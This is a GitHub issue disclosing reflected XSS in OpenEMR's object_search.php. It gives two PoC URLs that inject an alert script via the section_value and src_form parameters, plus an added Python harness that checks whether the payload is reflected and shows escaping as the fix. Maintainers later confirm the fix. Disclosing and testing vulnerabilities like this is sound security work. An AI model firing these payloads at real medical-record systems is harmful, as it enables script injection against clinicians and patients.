
OpenEMR (latest version) - Multiple Cross-Site Scripting (XSS) #498

Closed
bestshow opened this issue Feb 27, 2017 · 5 comments

Comments

@bestshow

commented Feb 27, 2017

Product: OpenEMR
Download: https://github.com/openemr/openemr
Vulnerable Version: latest version and probably prior
Tested Version: latest version
Author: ADLab of Venustech

Advisory Details:
I have discovered multiple Cross-Site Scripting (XSS) vulnerabilities in “OpenEMR”, which can be exploited to execute arbitrary code.
The vulnerability exists due to insufficient filtering of user-supplied data in multiple HTTP GET parameters passed to the “openemr-master/gacl/admin/object_search.php” URL. An attacker could execute arbitrary HTML and script code in the browser in the context of the vulnerable website.
The exploitation examples below use the "alert()" JavaScript function to show a pop-up message box:
PoC:
(1)
http://localhost/github1/zip/openemr_master/openemr-master/gacl/admin/object_search.php?section_value=%22%3E%3Cscript%3Ealert(1);%3C/script%3E%3C%22
(2)
http://localhost/github1/zip/openemr_master/openemr-master/gacl/admin/object_search.php?src_form=%22%3E%3Cscript%3Ealert(1);%3C/script%3E%3C%22
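
Added example (not OpenEMR's code and not part of the report above): a small Python harness that rebuilds the two PoC requests for `section_value` and `src_form`, decodes them the way a server would, feeds the values through a hypothetical template that reflects them into a double-quoted attribute, and reports whether the `">` attribute breakout and the `<script>` tag survive. The `TARGET` path, the hidden-input template and all function names are assumptions for illustration; `render_fixed` shows the output escaping that closes this class of bug (the Python analogue of PHP's `htmlspecialchars($v, ENT_QUOTES)`).

```python
"""Reflected-XSS reflection check for the two GET parameters named in the
report (section_value, src_form). Added example, not OpenEMR code; the
hidden-input template is an assumed rendering shape, not object_search.php."""
import html
import re
from urllib.parse import parse_qs, urlencode, urlsplit

# Assumed location of the vulnerable script; adjust for your deployment.
TARGET = "http://localhost/openemr-master/gacl/admin/object_search.php"
PARAMS = ("section_value", "src_form")

# The PoC payload, percent-decoded: closes the attribute and the tag,
# injects a script element, then re-opens a quote to keep the HTML tidy.
PAYLOAD = '"><script>alert(1);</script><"'

SCRIPT_TAG = re.compile(r"<script\b", re.IGNORECASE)


def poc_url(param: str, payload: str = PAYLOAD) -> str:
    """Build the PoC URL for one parameter, percent-encoded as a browser sends it."""
    return f"{TARGET}?{urlencode({param: payload})}"


def render_vulnerable(params: dict) -> str:
    """Hypothetical vulnerable template: the value is echoed into an
    attribute with no output encoding, so a leading '"' ends the attribute."""
    return "".join(
        f'<input type="hidden" name="{k}" value="{v}">' for k, v in params.items()
    )


def render_fixed(params: dict) -> str:
    """Same template with the value HTML-escaped. quote=True escapes both
    '"' and "'", matching PHP htmlspecialchars($v, ENT_QUOTES)."""
    return "".join(
        f'<input type="hidden" name="{k}" value="{html.escape(v, quote=True)}">'
        for k, v in params.items()
    )


def reflected_unescaped(body: str, payload: str = PAYLOAD) -> bool:
    """True when the payload is reflected verbatim (breakout plus a live
    <script> tag); False when it came back entity-encoded."""
    return payload in body and SCRIPT_TAG.search(body) is not None


def check_param(param: str, renderer) -> bool:
    """Simulate one request: parse the PoC URL's query string exactly as a
    server would and hand the decoded values to the renderer."""
    query = parse_qs(urlsplit(poc_url(param)).query)
    sent = {k: v[0] for k, v in query.items()}
    return reflected_unescaped(renderer(sent))


def scan(renderer) -> dict:
    """Map each reported parameter to True (vulnerable) or False (escaped)."""
    return {p: check_param(p, renderer) for p in PARAMS}


if __name__ == "__main__":
    for p in PARAMS:
        print(poc_url(p))
    print("unescaped template:", scan(render_vulnerable))
    print("escaped template:  ", scan(render_fixed))
```

Against a live instance, replace the renderer with the HTTP response body for `poc_url(param)` and run the same `reflected_unescaped` check; a fix is only confirmed when both parameters come back entity-encoded. When applying the fix in PHP, the `ENT_QUOTES` flag matters: `htmlspecialchars()` without it (the default before PHP 8.1) leaves single quotes alone, which still allows breakout from a single-quoted attribute.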

@bradymiller

Member

commented Feb 28, 2017

The solution for this vulnerability is currently being worked on by a group researching tools to fix vulnerabilities.

@bestshow bestshow closed this May 31, 2017

@bradymiller

Member

commented May 31, 2017

@bestshow ,
Just checking why this was closed?
thanks,
-brady

@bestshow

Author

commented May 31, 2017

@bradymiller, sorry, I made a mistake, I'll reopen it.

@bestshow bestshow reopened this May 31, 2017

@bradymiller

Member

commented May 31, 2017

no prob (I commonly make this mistake also).

@bradymiller bradymiller added this to the 5.0.1 milestone Oct 26, 2017

@bradymiller

Member

commented Jan 16, 2018

this was fixed via both:
#1388
6d8234d
